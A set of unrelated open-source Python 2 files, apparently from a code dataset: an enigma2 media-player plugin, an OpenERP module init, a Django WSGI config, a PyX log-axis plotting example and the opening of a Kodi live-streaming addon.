self.updateSingleMusicInformation("year", year, clear)
self.updateSingleMusicInformation("genre", genre, clear)
def updateSingleMusicInformation(self, name, info, clear):
if info != "" or clear:
if self[name].getText() != info:
self[name].setText(info)
def leftDown(self):
self.lefttimer = True
self.leftKeyTimer.start(1000)
def rightDown(self):
self.righttimer = True
self.rightKeyTimer.start(1000)
def leftUp(self):
if self.lefttimer:
self.leftKeyTimer.stop()
self.lefttimer = False
self[self.currList].pageUp()
self.updateCurrentInfo()
def rightUp(self):
if self.righttimer:
self.rightKeyTimer.stop()
self.righttimer = False
self[self.currList].pageDown()
self.updateCurrentInfo()
def leftTimerFire(self):
self.leftKeyTimer.stop()
self.lefttimer = False
self.switchToFileList()
def rightTimerFire(self):
self.rightKeyTimer.stop()
self.righttimer = False
self.switchToPlayList()
def switchToFileList(self):
self.currList = "filelist"
self.filelist.selectionEnabled(1)
self.playlist.selectionEnabled(0)
self.updateCurrentInfo()
def switchToPlayList(self):
if len(self.playlist) != 0:
self.currList = "playlist"
self.filelist.selectionEnabled(0)
self.playlist.selectionEnabled(1)
self.updateCurrentInfo()
def up(self):
self[self.currList].up()
self.updateCurrentInfo()
def down(self):
self[self.currList].down()
self.updateCurrentInfo()
def showAfterSeek(self):
if not self.shown:
self.hideAndInfoBar()
def showAfterCuesheetOperation(self):
self.show()
def hideAfterResume(self):
self.hideAndInfoBar()
def getIdentifier(self, ref):
if self.isAudioCD:
return ref.getName()
else:
text = ref.getPath()
return text.split('/')[-1]
# FIXME: maybe this code can be optimized
def updateCurrentInfo(self):
text = ""
if self.currList == "filelist":
idx = self.filelist.getSelectionIndex()
r = self.filelist.list[idx]
text = r[1][7]
if r[0][1] == True:
if len(text) < 2:
text += " "
if text[:2] != "..":
text = "/" + text
self.summaries.setText(text,1)
idx += 1
if idx < len(self.filelist.list):
r = self.filelist.list[idx]
text = r[1][7]
if r[0][1] == True:
text = "/" + text
self.summaries.setText(text,3)
else:
self.summaries.setText(" ",3)
idx += 1
if idx < len(self.filelist.list):
r = self.filelist.list[idx]
text = r[1][7]
if r[0][1] == True:
text = "/" + text
self.summaries.setText(text,4)
else:
self.summaries.setText(" ",4)
text = ""
if not self.filelist.canDescent():
r = self.filelist.getServiceRef()
if r is None:
return
text = r.getPath()
self["currenttext"].setText(os.path.basename(text))
if self.currList == "playlist":
t = self.playlist.getSelection()
if t is None:
return
#display current selected entry on LCD
text = self.getIdentifier(t)
self.summaries.setText(text,1)
self["currenttext"].setText(text)
idx = self.playlist.getSelectionIndex()
idx += 1
if idx < len(self.playlist):
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.summaries.setText(text,3)
else:
self.summaries.setText(" ",3)
idx += 1
if idx < len(self.playlist):
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.summaries.setText(text,4)
else:
self.summaries.setText(" ",4)
def ok(self):
if self.currList == "filelist":
if self.filelist.canDescent():
self.filelist.descent()
self.updateCurrentInfo()
else:
self.copyFile()
if self.currList == "playlist":
if self.playlist.getCurrentIndex() == self.playlist.getSelectionIndex() and not self.playlist.isStopped():
if self.shown:
self.hideAndInfoBar()
elif self.mediaPlayerInfoBar.shown:
self.mediaPlayerInfoBar.hide()
self.hideMediaPlayerInfoBar.stop()
if self.ext in AUDIO_EXTENSIONS or self.isAudioCD:
self.show()
else:
self.mediaPlayerInfoBar.show()
else:
self.changeEntry(self.playlist.getSelectionIndex())
def showMenu(self):
menu = []
if len(self.cdAudioTrackFiles):
menu.insert(0,(_("Play audio-CD..."), "audiocd"))
if self.currList == "filelist":
if self.filelist.canDescent():
menu.append((_("Add directory to playlist"), "copydir"))
else:
menu.append((_("Add files to playlist"), "copyfiles"))
menu.append((_("Switch to playlist"), "playlist"))
if config.usage.setup_level.index >= 1: # intermediate+
menu.append((_("Delete file"), "deletefile"))
else:
menu.append((_("Switch to filelist"), "filelist"))
menu.append((_("Clear playlist"), "clear"))
menu.append((_("Delete entry"), "deleteentry"))
if config.usage.setup_level.index >= 1: # intermediate+
menu.append((_("Shuffle playlist"), "shuffle"))
menu.append((_("Hide player"), "hide"))
menu.append((_("Load playlist"), "loadplaylist"));
if config.usage.setup_level.index >= 1: # intermediate+
menu.append((_("Save playlist"), "saveplaylist"))
menu.append((_("Delete saved playlist"), "deleteplaylist"))
menu.append((_("Edit settings"), "settings"))
if self.pipZapAvailable:
menu.append((_("Menu") + " PiP", "pip"))
if self.isPiPzap():
menu.append((_("Open service list"), "servicelist"))
self.timerHideMediaPlayerInfoBar()
self.session.openWithCallback(self.menuCallback, ChoiceBox, title="", list=menu)
def menuCallback(self, choice):
self.show()
if choice is None:
return
if choice[1] == "copydir":
self.copyDirectory(self.filelist.getSelection()[0])
elif choice[1] == "copyfiles":
self.copyDirectory(os.path.dirname(self.filelist.getSelection()[0].getPath()) + "/", recursive = False)
elif choice[1] == "playlist":
self.switchToPlayList()
elif choice[1] == "filelist":
self.switchToFileList()
elif choice[1] == "deleteentry":
if self.playlist.getSelectionIndex() == self.playlist.getCurrentIndex():
self.stopEntry()
self.deleteEntry()
elif choice[1] == "clear":
self.clear_playlist()
elif choice[1] == "hide":
self.hideAndInfoBar()
elif choice[1] == "saveplaylist":
self.save_playlist()
elif choice[1] == "loadplaylist":
self.load_playlist()
elif choice[1] == "deleteplaylist":
self.delete_saved_playlist()
elif choice[1] == "shuffle":
self.playlist.PlayListShuffle()
elif choice[1] == "deletefile":
self.deleteFile()
elif choice[1] == "settings":
self.session.openWithCallback(self.applySettings, MediaPlayerSettings, self)
elif choice[1] == "audiocd":
self.playAudioCD()
elif choice[1] == "pip":
self.activatePiP()
elif choice[1] == "servicelist":
self.openServiceList()
def playAudioCD(self):
from enigma import eServiceReference
if len(self.cdAudioTrackFiles):
self.playlist.clear()
self.savePlaylistOnExit = False
self.isAudioCD = True
for x in self.cdAudioTrackFiles:
ref = eServiceReference(4097, 0, x)
self.playlist.addFile(ref)
try:
from Plugins.Extensions.CDInfo.plugin import Query
cdinfo = Query(self)
cdinfo.scan()
except ImportError:
pass # we can live without CDInfo
self.changeEntry(0)
self.switchToPlayList()
def applySettings(self, answer=True):
if answer is True:
self.savePlaylistOnExit = config.mediaplayer.savePlaylistOnExit.getValue()
if config.mediaplayer.repeat.getValue() == True:
self["repeat"].setPixmapNum(1)
else:
self["repeat"].setPixmapNum(0)
def showEventInformation(self):
from Screens.EventView import EventViewSimple
from ServiceReference import ServiceReference
evt = self[self.currList].getCurrentEvent()
if evt:
self.session.open(EventViewSimple, evt, ServiceReference(self.getCurrent()))
# also works on filelist (?)
def getCurrent(self):
return self["playlist"].getCurrent()
def deletePlaylistEntry(self):
if self.currList == "playlist":
if self.playlist.getSelectionIndex() == self.playlist.getCurrentIndex():
self.stopEntry()
self.deleteEntry()
def skip_listbegin(self):
if self.currList == "filelist":
self.filelist.moveToIndex(0)
else:
self.playlist.moveToIndex(0)
self.updateCurrentInfo()
def skip_listend(self):
if self.currList == "filelist":
idx = len(self.filelist.list)
self.filelist.moveToIndex(idx - 1)
else:
self.playlist.moveToIndex(len(self.playlist)-1)
self.updateCurrentInfo()
def save_playlist(self):
self.session.openWithCallback(self.save_playlist2,InputBox, title=_("Please enter filename (empty = use current date)"),windowTitle = _("Save playlist"), text=self.playlistname)
def save_playlist2(self, name):
if name is not None:
name = name.strip()
if name == "":
name = time.strftime("%y%m%d_%H%M%S")
self.playlistname = name
name += ".e2pls"
self.playlistIOInternal.clear()
for x in self.playlist.list:
self.playlistIOInternal.addService(ServiceReference(x[0]))
self.playlistIOInternal.save(resolveFilename(SCOPE_PLAYLIST) + name)
def get_playlists(self):
listpath = []
playlistdir = resolveFilename(SCOPE_PLAYLIST)
try:
for i in os.listdir(playlistdir):
listpath.append((i,playlistdir + i))
except IOError,e:
print "Error while scanning subdirs ",e
if config.mediaplayer.sortPlaylists.value:
listpath.sort()
return listpath
def load_playlist(self):
listpath = self.get_playlists()
if listpath:
self.session.openWithCallback(self.PlaylistSelected, ChoiceBox, title=_("Please select a playlist..."), list = listpath)
else:
self.session.open(MessageBox, _("There are no saved playlists to load!"), MessageBox.TYPE_ERROR)
def PlaylistSelected(self,path):
if path is not None:
self.playlistname = path[0].rsplit('.',1)[-2]
self.clear_playlist()
extension = path[0].rsplit('.',1)[-1]
if extension in self.playlistparsers:
playlist = self.playlistparsers[extension]()
list = playlist.open(path[1])
for x in list:
self.playlist.addFile(x.ref)
self.playlist.updateList()
def delete_saved_playlist(self):
listpath = self.get_playlists()
if listpath:
self.session.openWithCallback(self.DeletePlaylistSelected, ChoiceBox, title=_("Please select a playlist to delete..."), list = listpath)
else:
self.session.open(MessageBox, _("There are no saved playlists to delete!"), MessageBox.TYPE_ERROR)
def DeletePlaylistSelected(self,path):
if path is not None:
self.delname = path[1]
self.session.openWithCallback(self.deleteConfirmed, MessageBox, _("Do you really want to delete %s?") % (path[1]))
def deleteConfirmed(self, confirmed):
if confirmed:
try:
os.remove(self.delname)
except OSError,e:
print "delete failed:", e
self.session.open(MessageBox, _("Delete failed!"), MessageBox.TYPE_ERROR)
def clear_playlist(self):
self.isAudioCD = False
self.stopEntry()
self.playlist.clear()
self.switchToFileList()
def copyDirectory(self, directory, recursive = True):
print "copyDirectory", directory
if directory == '/':
print "refusing to operate on /"
return
filelist = FileList(directory, useServiceRef = True, showMountpoints = False, isTop = True)
for x in filelist.getFileList():
if x[0][1] == True: #isDir
if recursive:
if x[0][0] != directory:
self.copyDirectory(x[0][0])
elif filelist.getServiceRef() and filelist.getServiceRef().type == 4097:
self.playlist.addFile(x[0][0])
self.playlist.updateList()
def deleteFile(self):
if self.currList == "filelist":
self.service = self.filelist.getServiceRef()
else:
self.service = self.playlist.getSelection()
if self.service is None:
return
if self.service.type != 4098 and self.session.nav.getCurrentlyPlayingServiceReference() is not None:
if self.service == self.session.nav.getCurrentlyPlayingServiceReference():
self.stopEntry()
serviceHandler = eServiceCenter.getInstance()
offline = serviceHandler.offlineOperations(self.service)
info = serviceHandler.info(self.service)
name = info and info.getName(self.service)
result = False
if offline is not None:
# simulate first
if not offline.deleteFromDisk(1):
result = True
if result == True:
self.session.openWithCallback(self.deleteConfirmed_offline, MessageBox, _("Do you really want to delete %s?") % (name))
else:
self.session.openWithCallback(self.close, MessageBox, _("You cannot delete this!"), MessageBox.TYPE_ERROR)
def deleteConfirmed_offline(self, confirmed):
if confirmed:
serviceHandler = eServiceCenter.getInstance()
offline = serviceHandler.offlineOperations(self.service)
result = False
if offline is not None:
# really delete!
if not offline.deleteFromDisk(0):
result = True
if result == False:
self.session.open(MessageBox, _("Delete failed!"), MessageBox.TYPE_ERROR)
else:
self.removeListEntry()
def removeListEntry(self):
currdir = self.filelist.getCurrentDirectory()
self.filelist.changeDir(currdir)
deleteend = False
while not deleteend:
index = 0
deleteend = True
if len(self.playlist) > 0:
for x in self.playlist.list:
if self.service == x[0]:
self.playlist.deleteFile(index)
deleteend = False
break
index += 1
self.playlist.updateList()
if self.currList == "playlist":
if len(self.playlist) == 0:
self.switchToFileList()
def copyFile(self):
if self.filelist.getServiceRef().type == 4098: # playlist
ServiceRef = self.filelist.getServiceRef()
extension = ServiceRef.getPath()[ServiceRef.getPath().rfind('.') + 1:]
if extension in self.playlistparsers:
playlist = self.playlistparsers[extension]()
list = playlist.open(ServiceRef.getPath())
for x in list:
self.playlist.addFile(x.ref)
self.playlist.updateList()
else:
self.playlist.addFile(self.filelist.getServiceRef())
self.playlist.updateList()
if len(self.playlist) == 1:
self.changeEntry(0)
def addPlaylistParser(self, parser, extension):
self.playlistparsers[extension] = parser
def nextEntry(self):
next = self.playlist.getCurrentIndex() + 1
if next < len(self.playlist):
self.changeEntry(next)
elif ( len(self.playlist) > 0 ) and ( config.mediaplayer.repeat.getValue() == True ):
self.stopEntry()
self.changeEntry(0)
elif ( len(self.playlist) > 0 ):
self.stopEntry()
def nextMarkOrEntry(self):
if not self.jumpPreviousNextMark(lambda x: x):
next = self.playlist.getCurrentIndex() + 1
if next < len(self.playlist):
self.changeEntry(next)
else:
self.doSeek(-1)
def previousMarkOrEntry(self):
if not self.jumpPreviousNextMark(lambda x: -x-5*90000, start=True):
next = self.playlist.getCurrentIndex() - 1
if next >= 0:
self.changeEntry(next)
def deleteEntry(self):
self.playlist.deleteFile(self.playlist.getSelectionIndex())
self.playlist.updateList()
if len(self.playlist) == 0:
self.switchToFileList()
def changeEntry(self, index):
self.playlist.setCurrentPlaying(index)
self.playEntry()
def playServiceRefEntry(self, serviceref):
serviceRefList = self.playlist.getServiceRefList()
for count in range(len(serviceRefList)):
if serviceRefList[count] == serviceref:
self.changeEntry(count)
break
def xplayEntry(self):
if self.currList == "playlist":
self.playEntry()
else:
self.stopEntry()
self.playlist.clear()
self.isAudioCD = False
sel = self.filelist.getSelection()
if sel:
if sel[1]: # can descent
# add directory to playlist
self.copyDirectory(sel[0])
else:
# add files to playlist
self.copyDirectory(os.path.dirname(sel[0].getPath()) + "/", recursive = False)
if len(self.playlist) > 0:
self.changeEntry(0)
def playEntry(self):
if len(self.playlist.getServiceRefList()):
needsInfoUpdate = False
currref = self.playlist.getServiceRefList()[self.playlist.getCurrentIndex()]
if self.session.nav.getCurrentlyPlayingServiceReference() is None or currref != self.session.nav.getCurrentlyPlayingServiceReference() or self.playlist.isStopped():
self.session.nav.playService(self.playlist.getServiceRefList()[self.playlist.getCurrentIndex()])
info = eServiceCenter.getInstance().info(currref)
description = info and info.getInfoString(currref, iServiceInformation.sDescription) or ""
self["title"].setText(description)
				# display the currently playing music on the LCD
idx = self.playlist.getCurrentIndex()
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.ext = os.path.splitext(text)[1].lower()
text = ">"+text
				# FIXME: whether the service contains video (and we should hide our window) should come from the service itself
if self.ext not in AUDIO_EXTENSIONS and not self.isAudioCD:
self.hideAndInfoBar()
else:
needsInfoUpdate = True
self.summaries.setText(text,1)
# get the next two entries
idx += 1
if idx < len(self.playlist):
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.summaries.setText(text,3)
else:
self.summaries.setText(" ",3)
idx += 1
if idx < len(self.playlist):
currref = self.playlist.getServiceRefList()[idx]
text = self.getIdentifier(currref)
self.summaries.setText(text,4)
else:
self.summaries.setText(" ",4)
else:
idx = self.playlist.getCurrentIndex()
currref = self.playlist.getServiceRefList()[idx]
text = currref.getPath()
ext = os.path.splitext(text)[1].lower()
				if ext not in AUDIO_EXTENSIONS and not self.isAudioCD:
self.hideAndInfoBar()
else:
needsInfoUpdate = True
self.unPauseService()
if needsInfoUpdate == True:
path = self.playlist.getServiceRefList()[self.playlist.getCurrentIndex()].getPath()
self["coverArt"].updateCoverArt(path)
else:
self["coverArt"].showDefaultCover()
self.readTitleInformation()
def updatedSeekState(self):
if self.seekstate == self.SEEK_STATE_PAUSE:
self.playlist.pauseFile()
elif self.seekstate == self.SEEK_STATE_PLAY:
self.playlist.playFile()
elif self.isStateForward(self.seekstate):
self.playlist.forwardFile()
elif self.isStateBackward(self.seekstate):
self.playlist.rewindFile()
def pauseEntry(self):
self.pauseService()
if self.seekstate == self.SEEK_STATE_PAUSE:
self.show()
else:
self.hideAndInfoBar()
def stopEntry(self):
self.playlist.stopFile()
self.session.nav.playService(None)
self.updateMusicInformation(clear=True)
self.show()
def unPauseService(self):
self.setSeekState(self.SEEK_STATE_PLAY)
def subtitleSelection(self):
from Screens.AudioSelection import SubtitleSelection
self.session.open(SubtitleSelection, self)
def hotplugCB(self, dev, media_state):
if media_state == "audiocd" or media_state == "audiocdadd":
self.cdAudioTrackFiles = []
if os.path.isfile('/media/audiocd/cdplaylist.cdpls'):
list = open("/media/audiocd/cdplaylist.cdpls")
if list:
self.isAudioCD = True
for x in list:
xnon = x.replace("\n", "")
self.cdAudioTrackFiles.append(xnon)
self.playAudioCD()
else:
self.cdAudioTrackFiles = []
if self.isAudioCD:
self.clear_playlist()
else:
self.cdAudioTrackFiles = []
if self.isAudioCD:
self.clear_playlist()
def isPiPzap(self):
return self.pipZapAvailable and self.servicelist and self.servicelist.dopipzap
def openServiceList(self):
if self.isPiPzap():
self.session.execDialog(self.servicelist)
def activatePiP(self):
if self.pipZapAvailable:
if InfoBar.instance is not None:
modeslist = [ ]
keyslist = [ ]
if InfoBar.pipShown(InfoBar.instance):
slist = self.servicelist
if slist:
if slist.dopipzap:
modeslist.append((_("Zap focus to main screen"), "pipzap"))
else:
modeslist.append((_("Zap focus to Picture in Picture"), "pipzap"))
keyslist.append('red')
modeslist.append((_("Move Picture in Picture"), "move"))
keyslist.append('green')
modeslist.append((_("Disable Picture in Picture"), "stop"))
keyslist.append('blue')
else:
modeslist.append((_("Activate Picture in Picture"), "start"))
keyslist.append('blue')
dlg = self.session.openWithCallback(self.pipAnswerConfirmed, ChoiceBox, list = modeslist, keys = keyslist)
dlg.setTitle(_("Menu") + " PiP")
def pipAnswerConfirmed(self, answer):
answer = answer and answer[1]
if answer is not None and InfoBar.instance is not None:
slist = self.servicelist
if answer == "pipzap":
InfoBar.togglePipzap(InfoBar.instance)
elif answer == "move":
InfoBar.movePiP(InfoBar.instance)
elif answer == "stop":
if InfoBar.pipShown(InfoBar.instance):
if slist and slist.dopipzap:
slist.togglePipzap()
if hasattr(self.session, 'pip'):
del self.session.pip
self.session.pipshown = False
elif answer == "start":
prev_playingref = self.session.nav.currentlyPlayingServiceOrGroup
if prev_playingref:
self.session.nav.currentlyPlayingServiceOrGroup = None
InfoBar.showPiP(InfoBar.instance)
if prev_playingref:
self.session.nav.currentlyPlayingServiceOrGroup = prev_playingref
if slist and not slist.dopipzap and hasattr(self.session, 'pip'):
InfoBar.togglePipzap(InfoBar.instance)
def nextBouquet(self):
if not self.shown and self.isPiPzap():
slist = self.servicelist
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and slist.atEnd():
slist.nextBouquet()
else:
slist.moveDown()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveDown()
slist.zap(enable_pipzap = True)
else:
if self.currList == "filelist":
self.switchToPlayList()
else:
self.switchToFileList()
def prevBouquet(self):
if not self.shown and self.isPiPzap():
slist = self.servicelist
if slist.inBouquet():
prev = slist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value:
if slist.atBegin():
slist.prevBouquet()
slist.moveUp()
cur = slist.getCurrentSelection()
if not cur or (not (cur.flags & 64)) or cur.toString() == prev:
break
else:
slist.moveUp()
slist.zap(enable_pipzap = True)
else:
if self.currList == "filelist":
self.switchToPlayList()
else:
self.switchToFileList()
class MediaPlayerLCDScreen(Screen):
skin = (
"""<screen name="MediaPlayerLCDScreen" position="0,0" size="132,64" id="1">
<widget name="text1" position="4,0" size="132,35" font="Regular;16"/>
<widget name="text3" position="4,36" size="132,14" font="Regular;10"/>
<widget name="text4" position="4,49" size="132,14" font="Regular;10"/>
</screen>""",
"""<screen name="MediaPlayerLCDScreen" position="0,0" size="96,64" id="2">
<widget name="text1" position="0,0" size="96,35" font="Regular;14"/>
<widget name="text3" position="0,36" size="96,14" font="Regular;10"/>
<widget name="text4" position="0,49" size="96,14" font="Regular;10"/>
</screen>""")
def __init__(self, session, parent):
Screen.__init__(self, session)
self["text1"] = Label("Media player")
self["text3"] = Label("")
self["text4"] = Label("")
def setText(self, text, line):
if len(text) > 10:
if text[-4:] == ".mp3":
text = text[:-4]
textleer = " "
text = text + textleer*10
if line == 1:
self["text1"].setText(text)
elif line == 3:
self["text3"].setText(text)
elif line == 4:
self["text4"].setText(text)
def mainCheckTimeshiftCallback(session, answer):
if answer:
session.open(MediaPlayer)
def main(session, **kwargs):
InfoBar.instance.checkTimeshiftRunning(boundFunction(mainCheckTimeshiftCallback, session))
def menu(menuid, **kwargs):
if menuid == "mainmenu" and config.mediaplayer.onMainMenu.getValue():
return [(_("Media player"), main, "media_player", 45)]
return []
def filescan_open(list, session, **kwargs):
from enigma import eServiceReference
mp = session.open(MediaPlayer)
mp.playlist.clear()
mp.savePlaylistOnExit = False
for file in list:
if file.mimetype == "video/mp2t":
stype = 1
else:
stype = 4097
ref = eServiceReference(stype, 0, file.path)
mp.playlist.addFile(ref)
mp.changeEntry(0)
mp.switchToPlayList()
def audioCD_open(list, session, **kwargs):
from enigma import eServiceReference
if os.path.isfile('/media/audiocd/cdplaylist.cdpls'):
list = open("/media/audiocd/cdplaylist.cdpls")
else:
		# TODO: add a message box to inform the user that the audio CD could not be opened.
return False
mp = session.open(MediaPlayer)
if list:
mp.isAudioCD = True
for x in list:
xnon = x.replace("\n", "")
mp.cdAudioTrackFiles.append(xnon)
mp.playAudioCD()
else:
		# TODO: add a message box to inform the user that the audio CD could not be opened.
return False
def audioCD_open_mn(session, **kwargs):
from enigma import eServiceReference
if os.path.isfile('/media/audiocd/cdplaylist.cdpls'):
list = open("/media/audiocd/cdplaylist.cdpls")
else:
		# TODO: add a message box to inform the user that the audio CD could not be opened.
return False
mp = session.open(MediaPlayer)
if list:
mp.isAudioCD = True
for x in list:
xnon = x.replace("\n", "")
mp.cdAudioTrackFiles.append(xnon)
mp.playAudioCD()
else:
		# TODO: add a message box to inform the user that the audio CD could not be opened.
return False
def movielist_open(list, session, **kwargs):
if not list:
# sanity
return
from enigma import eServiceReference
from Screens.InfoBar import InfoBar
f = list[0]
if f.mimetype == "video/mp2t":
stype = 1
else:
stype = 4097
if InfoBar.instance:
path = os.path.split(f.path)[0]
if not path.endswith('/'):
path += '/'
config.movielist.last_videodir.value = path
InfoBar.instance.showMovies(eServiceReference(stype, 0, f.path))
def audiocdscan(menuid, **kwargs):
try:
from Plugins.SystemPlugins.Hotplug.plugin import AudiocdAdded
except Exception, e:
print "[Mediaplayer.plugin] no hotplug support",e
return []
if menuid == "mainmenu" and AudiocdAdded() and os.path.isfile('/media/audiocd/cdplaylist.cdpls'):
return [(_("Play audio-CD..."), audioCD_open_mn, "play_cd", 45)]
else:
return []
def filescan(**kwargs):
from Components.Scanner import Scanner, ScanPath
return [
Scanner(mimetypes = ["video/mpeg", "video/mp2t", "video/x-msvideo", "video/mkv", "video/x-ms-wmv", "video/x-matroska", "video/ogg", "video/dvd", "video/mp4", "video/avi", "video/divx", "video/x-mpeg", "video/x-flv", "video/quicktime", "video/x-ms-asf", "video/3gpp", "video/3gpp2", "application/vnd.rn-realmedia", "application/vnd.rn-realmedia-vbr", "video/mts"],
paths_to_scan =
[
ScanPath(path = "", with_subdirs = False),
ScanPath(path = "PRIVATE/AVCHD/BDMV/STREAM", with_subdirs = False),
],
name = "Movie",
description = _("Watch movies..."),
openfnc = movielist_open,
),
Scanner(mimetypes = ["video/x-vcd"],
paths_to_scan =
[
ScanPath(path = "mpegav", with_subdirs = False),
ScanPath(path = "MPEGAV", with_subdirs = False),
],
name = "Video CD",
description = _("View video CD..."),
openfnc = filescan_open,
),
Scanner(mimetypes = ["audio/mpeg", "audio/x-wav", "audio/dts", "audio/ogg", "audio/flac", "audio/mp4", "audio/x-ms-wma", "audio/ac3", "audio/x-matroska", "audio/x-aac", "audio/x-monkeys-audio"],
paths_to_scan =
[
ScanPath(path = "", with_subdirs = False),
],
name = "Music",
description = _("Play music..."),
openfnc = filescan_open,
),
Scanner(mimetypes = ["audio/x-cda"],
paths_to_scan =
[
ScanPath(path = "", with_subdirs = False),
],
name = "Audio-CD",
description = _("Play audio-CD..."),
openfnc = audioCD_open,
),
]
from Plugins.Plugin import PluginDescriptor
def Plugins(**kwargs):
return [
PluginDescriptor(name = _("Media player"), description = _("Play back media files"), where = PluginDescriptor.WHERE_PLUGINMENU, icon="MediaPlayer.png", needsRestart = False, fnc = main),
PluginDescriptor(name = _("Media player"), where = PluginDescriptor.WHERE_FILESCAN, needsRestart = False, fnc = filescan),
PluginDescriptor(name = _("Media player"), where = PluginDescriptor.WHERE_MENU, needsRestart = False, fnc = audiocdscan),
PluginDescriptor(name = _("Media player"), description = _("Play back media files"), where = PluginDescriptor.WHERE_MENU, needsRestart = False, fnc = menu)
]
|
Antonio-Team/enigma2
|
lib/python/Plugins/Extensions/MediaPlayer/plugin.py
|
Python
|
gpl-2.0
| 43,557
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
###############################################################################
# Module Writen to OpenERP, Open Source Management Solution
# Copyright (C) OpenERP Venezuela (<http://www.vauxoo.com>).
# All Rights Reserved
############# Credits #########################################################
# Coded by: Katherine Zaoral <kathy@vauxoo.com>
# Planified by: Katherine Zaoral <kathy@vauxoo.com>
# Audited by: Humberto Arocha <hbto@vauxoo.com>
###############################################################################
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
###############################################################################
import mrp_product_capacity
|
3dfxsoftware/cbss-addons
|
mrp_product_capacity/model/__init__.py
|
Python
|
gpl-2.0
| 1,386
|
"""
WSGI config for rentv project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "rentv.settings")
application = get_wsgi_application()
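# Deployment sketch (hedged): any WSGI server can serve this module. With
# gunicorn installed, for example (bind address is illustrative):
#
#     gunicorn rentv.wsgi:application --bind 0.0.0.0:8000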
|
icewind666/pythonsamples
|
rentv/rentv/wsgi.py
|
Python
|
gpl-2.0
| 387
|
import math
from pyx import *
from pyx.graph import axis
# we here use parters and texters which are explained in the examples below
log2parter = axis.parter.log([axis.parter.preexp([axis.tick.rational(1)], 4),
axis.parter.preexp([axis.tick.rational(1)], 2)])
log2texter = axis.texter.exponential(nomantissaexp=r"{2^{%s}}",
mantissamax=axis.tick.rational(2))
g = graph.graphxy(width=10,
x=axis.log(min=1, max=1024),
y=axis.log(min=1, max=1024, parter=log2parter),
y2=axis.log(min=1, max=1024, parter=log2parter, texter=log2texter))
g.writeEPSfile("log")
g.writePDFfile("log")
g.writeSVGfile("log")
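# Note: the y axis above gets labelled ticks at powers of 4 and unlabelled
# subticks at powers of 2 (the first and second preexp entries), and y2
# additionally renders its labels as 2^n via the exponential texter. A
# single-level base-10 variant, following the same constructor pattern
# (untested sketch), would be:
#
#     log10parter = axis.parter.log([axis.parter.preexp([axis.tick.rational(1)], 10)])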
|
mjg/PyX
|
examples/axis/log.py
|
Python
|
gpl-2.0
| 680
|
# -*- coding: utf-8 -*-
import urllib
import urllib2
import datetime
import re
import os
import sys
import xbmc  # xbmc and sys are used throughout this file but were missing from the imports
import xbmcplugin
import xbmcgui
import xbmcaddon
import xbmcvfs
from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
try:
import json
except:
import simplejson as json
import SimpleDownloader as downloader
addon = xbmcaddon.Addon('plugin.video.live.streaming')
addon_version = addon.getAddonInfo('version')
profile = xbmc.translatePath(addon.getAddonInfo('profile').decode('utf-8'))
home = xbmc.translatePath(addon.getAddonInfo('path').decode('utf-8'))
favorites = os.path.join(profile, 'favorites')
REV = os.path.join(profile, 'list_revision')
icon = os.path.join(home, 'icon.png')
FANART = os.path.join(home, 'fanart.jpg')
fanart = FANART  # lowercase alias; several helpers below refer to 'fanart' directly
source_file = os.path.join(profile, 'source_file')
downloader = downloader.SimpleDownloader()
debug = addon.getSetting('debug')
if os.path.exists(favorites)==True:
FAV = open(favorites).read()
else: FAV = []
if os.path.exists(source_file)==True:
SOURCES = open(source_file).read()
else: SOURCES = []
def addon_log(string):
if debug == 'true':
xbmc.log("[addon.live.streaming-%s]: %s" %(addon_version, string))
def makeRequest(url, headers=None):
try:
if headers is None:
headers = {'User-agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0'}
req = urllib2.Request(url,None,headers)
response = urllib2.urlopen(req)
data = response.read()
response.close()
return data
except urllib2.URLError, e:
addon_log('URL: '+url)
if hasattr(e, 'code'):
addon_log('We failed with error code - %s.' % e.code)
xbmc.executebuiltin("XBMC.Notification(Easystreams,We failed with error code - "+str(e.code)+",10000,"+icon+")")
elif hasattr(e, 'reason'):
addon_log('We failed to reach a server.')
addon_log('Reason: %s' %e.reason)
xbmc.executebuiltin("XBMC.Notification(Easystreams,We failed to reach a server. - "+str(e.reason)+",10000,"+icon+")")
def getSources():
if os.path.exists(favorites) == True:
addDir('Favorites','url',4,os.path.join(home, 'resources', 'favorite.png'),FANART,'','','','')
if addon.getSetting("browse_xml_database") == "true":
addDir('XML Database','http://xbmcplus.xb.funpic.de/www-data/filesystem/',15,icon,FANART,'','','','')
if addon.getSetting("browse_community") == "true":
addDir('Easystream Files','community_files',16,icon,FANART,'','','','')
if os.path.exists(source_file)==True:
sources = json.loads(open(source_file,"r").read())
if len(sources) > 1:
for i in sources:
## for pre 1.0.8 sources
if isinstance(i, list):
addDir(i[0].encode('utf-8'),i[1].encode('utf-8'),1,icon,FANART,'','','','','source')
else:
thumb = icon
fanart = FANART
desc = ''
date = ''
credits = ''
genre = ''
if i.has_key('thumbnail'):
thumb = i['thumbnail']
if i.has_key('fanart'):
fanart = i['fanart']
if i.has_key('description'):
desc = i['description']
if i.has_key('date'):
date = i['date']
if i.has_key('genre'):
genre = i['genre']
if i.has_key('credits'):
credits = i['credits']
